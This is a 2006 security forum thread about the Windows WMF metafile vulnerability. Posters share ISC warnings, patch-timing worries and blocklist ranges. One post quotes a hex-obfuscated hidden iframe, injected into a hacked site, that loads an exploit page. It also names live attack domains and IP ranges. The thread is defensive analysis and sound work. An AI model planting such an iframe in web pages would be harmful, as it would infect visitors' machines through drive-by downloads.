** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.

[Tiger Shark]

I use the Bleeding Snort rules coupled with the DNS blackhole list... The combination keeps me pretty clean from spyware.... I'm not so happy about the WMF threat though and my users are getting pissy... I just sent them all this:-

For those of you interested in why I am messing up your life so badly. Non-MyCompany staff may or may not wish to forward this to all their users as an explanation of the current situation.

This is quite long. For those who can't be bothered to read my lengthy emails the short version is "We are potentially [Insert your expletive of choice here]. This is big, it affects both your work and your home computers. Take precautions or be a part of the problem - worse yet suffer the worst the attackers want to do to you". The un-interested people may tune out and go back to their normal business.....

I _absolutely_ trust the good people at the Internet Storm Center. They are well know people in the computer security world. They are trusted worldwide by people who are far better at this stuff than me.

We are going though all these gyrations and inconvenience because what they have been saying over the last ten days mirrors what I have been thinking. They have made it quite clear today. I quote from their web site.

_____________________________________
"Are you ready to battle a large virus/worm outbreak? Please don't view
this is a prediction that there will be a large event, but let me just
say that conditions are right for a big storm (WMF issue and the return
of the Sober worm).

Regarding the WMF issue, you have probably decided to either wait for
the official Microsoft patch, or you are rolling out Ilfak's patch. But
there is still about 6-10 days of risk here for a major worldwide event...

1) There is a serious vulnerability in Microsoft operating systems.
2) An official patch will not be available from Microsoft until Jan. 10.
3) There are multiple propogation vectors: e-mail, instant messaging, web
surfing, etc.
4) Several different versions of the exploit are in the wild and are
being actively used by criminal groups. All propogation methods are
being used. As of Wednesday, Jan 4 20:15:00 UTC, our current poll
indicates that 22% of respondents (340) have seen exploit attempts
through one of the exploitation vectors.
5) Tools to generate random files to exploit the vulnerability are
publicly available. These tools may be used to evade anti-virus and
IDS/IPS signatures.
6) Anti-virus signatures and intrusion detection/prevention system
signatures may only be able to catch the first generation of exploits.
7) If an outbreak does occur, how are you going to sanitize laptops that
were infected outside of your network before allowing them to connect
to your internal network?"
_______________________________
The source of this text is at http://isc.sans.org/ for those who would like to read more - but it is technical and basically advice for people like myself.

January 10th is a misleading date... The reality is that on January 10th Microsoft's web site will be overloaded so getting the patch will be nearly impossible. It will be, realistically, the 11th or 12th before my update servers actually have the patch. It will be the 13th/14th before your workstations have the patch - But, because of the way the system works, it will be th 14th at the earliest - most likely the 15th before I can seriously consider that machines that are in regular use are patched, (yes, I know there is a weekend in there - I'm being optimistic). But then there are those computers in back rooms and offices where the worker only comes in weekly that will remain unpatched... They will remain a threat to the network until they are patched and will most likely be a threat for the first few hours they are used before they become invulnerable. This is why I have chosen to block access now and roll out the unofficial patch - It gives you some protection and it gives me a nice warm fuzzy feeling, which I like when I am scared - trust me.... ;-)

Fix your home computers too with the link I have provided for you - you'll get the warm fuzzy feeling too....

Lastly, don't think for one second that the bad guys aren't looking carefully at the patch and the exploitable module to see where they can continue their attack.....

I love my job, happy new year, I love my job, happy new year, I love my job, happy new year..... ad infinitum.... :-0

I think 5% will "get it"....

[rapier57]

I just sent an email to all our staff. This ain't fun.

[Tiger Shark]

Thrilling....

I've been working 0500-2000 for the last two days.... I'm too old for this ****... Show me the perp(s) and I will invite Nihil over with his arsenal for a few beers..... I'm sure he has something I can use too...

[rapier57]

I'll bring the .50 cal. with a fresh box of patches, grease and balls. Been wanting to do some shootin' anyway.

[Tiger Shark]

This is the BS none of us need:-

As a consequence, says Theriault, businesses should keep existing antivirus protection up to date and concentrate on blocking unsolicited mail while waiting for the Microsoft patch, as this may help to screen out attacks. They should encourage users to practice safe computing by only visiting reputable Web sites and taking care with what they download, she says.

The last sentence is _utterly_ laughable..... She's an idiot.... How many servers serve advertisments to AO alone? Then let's look at MSN, Yahoo etc.... Yep, she's a complete wally!!!!

Source

[RoadClosed]

I've been working 0500-2000 for the last two days.... I'm too old for this ****... Show me the perp(s) and I will invite Nihil over with his arsenal for a few beers..... I'm sure he has something I can use too...

Thats why I love my current job. Those are rare, even though I took a 20 percent cut from my last job. Oh **** it's 5:16 WTF am I still doing here. For added safety I am forcing all computers off the network at 6pm tonight. So I can havea beer in peace.

[Agent_Steal]

WMF Vulnerability Security Update

This is quite interesting ....

In our effort to put this security fix on a fast track, a pre-release version of the update was briefly and inadvertently posted on a security community site. There has been some discussion and pointers on subsequent sites to the pre-release code. We recommend that customers disregard the postings and continue keep up-to-date with our latest information on the WMF issue at http://www.microsoft.com/technet/sec...y/912840.mspx.

Anyone know where it was posted ???

[dynamoo]

I've now seen this in action on an infected web page.

Now, I'll post real domains here because I trust you boys and girls to be CAREFUL with this stuff. Use Samspade for Windows or some other safe browser.

Here's an infected site: www[dot]thirdgenerationbluegrassband[dot]com - the site itself has been hacked, so the exploit is nothing to do with the site owners.

At the beginning of the HTML is a IFRAME:

<iframe src= http:// do not click %77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

That deobfuscates to http://www[dot]trust4free[dot]ws/?id=index12 (don't visit this site in a standard web browser!!). This looks like an innocent site in Japanese, hosted on 85.255.114.164 (Inhoster). At the bottom of the page is what appears to be some standard Stats4all tracking code (attached as a GIF because it's waaaay too dangerous to post here)... but the tracking code refers to stats4all.cc which is not the correct URL, and is actually 85.255.114.163 (Inhoster again). Somewhere hidden in the Javascript is a call to load the infected file. (A quick Google search indicates that stats4all.ws is also suspect).

I almost missed the fake stats4all code, and I'm not going to muck around with it on a Windows PC. The IPs square nicely with the ISC recommended blocklist at http://isc.sans.org/diary.php?storyid=997

InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)

This is the same exploit that hit the knoppix-std.org site. A bit of Googling for stats4all.cc and trust4free.ws indicates that this has been going on since at least 18th December 2005, so more than a week before it became public knowledge.

To protect yourself against this particular threat from this particular source, I'd recommend applying the ISC blocklist. Also consider blocking access to .biz, .cc and .ws domains temporarily.

There are many other vectors for this thing to come in on though, so even if you block this particular common attack you're still potentially vulnerable to others.

[brokencrow]

I'm trying to figure out the forensics on this exploit. On the 28th, I received the file xpladv470.wmf via email (I believe). Fortunately, I am currently using Opera for a mail client and webbrowsing. Opera prompted me to save the file to my hdd, so I put it in My Documents (I NEVER opened it). I was immediately suspicious of the file so I scanned it via Panda's online scan.

Panda showed nothing. But nonetheless I remained leery of this file so I encrypted it to keep from being accidently run. Two days later I scanned it again (after unencrypting it) via Panda and sure enough, it got picked up as an "Exploit/Metafile". I believe this is our .wmf exploit and am wondering if it's compromised that laptop. Anyway of telling?

I checked the date stamps on the shimgvw.dll and gdi32.dll files, and neither's been modified recently. Anything else I need to be checking?

I run a number of computers, mostly old stuff. The laptop this has occurred on is a 'throwaway', an old Compaq running W2K, so I'm not too worried about cleaning it out.

[brentlea]

FYI

I just received word from our Microsoft Technical Account Manager that Microsoft is going to actually release MS06-001 TODAY at 2:00 PM Pacific Time. Yesterday our TAM told us that they would in no way consider releasing this patch "out of cycle" because they don't consider it a big threat.

Put on your patching hats and pray that this doesn't break something else.